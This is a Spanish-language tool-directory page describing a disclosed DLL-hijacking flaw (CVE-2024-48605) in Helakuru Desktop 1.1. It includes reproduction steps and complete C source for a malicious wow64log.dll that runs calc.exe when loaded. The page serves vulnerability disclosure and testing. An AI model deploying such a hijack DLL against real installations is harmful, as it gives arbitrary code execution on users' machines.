Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
HelakuruV.1.1-DLLHijack — Helakuru Versión 1.1 DLL Hijack - CVE-2024-48605 | Kitploit
Herramientas/GitHubGitHub/surajhacx/helakuruv.1.1-dllhijack
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónDesarrollo de PayloadsExplotación de Binarios
GitHubsurajhacx/helakuruv.1.1-dllhijack

HelakuruV.1.1-DLLHijack

Helakuru Versión 1.1 DLL Hijack - CVE-2024-48605

Ver Repositorio
535hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de secuestro de DLL en Helakuru

Resumen

La versión 1.1v de Helakuru Desktop opera en arquitecturas de 64 y 32 bits. Durante las pruebas, se identificó que el programa intenta cargar wow64log.dll, que no está incluido de forma predeterminada en los sistemas operativos Windows modernos. Esto produce un error de 'Name not found' (nombre no encontrado), exponiendo al programa a una vulnerabilidad de secuestro de DLL. Al crear un wow64log.dll malicioso, se puede lograr la ejecución de código arbitrario.

Versión afectada

Helakuru Desktop 1.1v

Pasos para reproducir

  1. Monitorear la carga de DLL con ProcMon
  • ProcMon mostrando la operación CreateFile con 'Name not found' para wow64log.dll Pasted image 20240925232040
  1. Crear un wow64log.dll malicioso
root@kitploit:~
#include <windows.h>
#include <stdio.h>

void LaunchCalculator()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    const char* calcCmd = "C:\\Windows\\System32\\calc.exe";

    if (!CreateProcessA(
        NULL,          
        (LPSTR)calcCmd, 
        NULL,          
        NULL,          
        FALSE,         
        0,             
        NULL,          
        NULL,          
        &si,           
        &pi))          
    {
        printf("CreateProcess failed (%d).\n", GetLastError());
    }
    else
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        LaunchCalculator();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
  1. Ejecutar Helakuru Desktop
  • Ejecuta Helakuru Desktop nuevamente. El wow64log.dll malicioso se cargará en el programa, abriendo la Calculadora como demostración de una inyección de DLL exitosa. Pasted image 20240925233737
  1. Verificar la carga de DLL usando ProcMon
  • Vuelve a abrir ProcMon y observa que wow64log.dll se carga correctamente esta vez, lo que confirma que el programa ha ejecutado el DLL personalizado. Pasted image 20240925232728

Impacto: Esta vulnerabilidad permite la ejecución de código arbitrario.

Descargar herramienta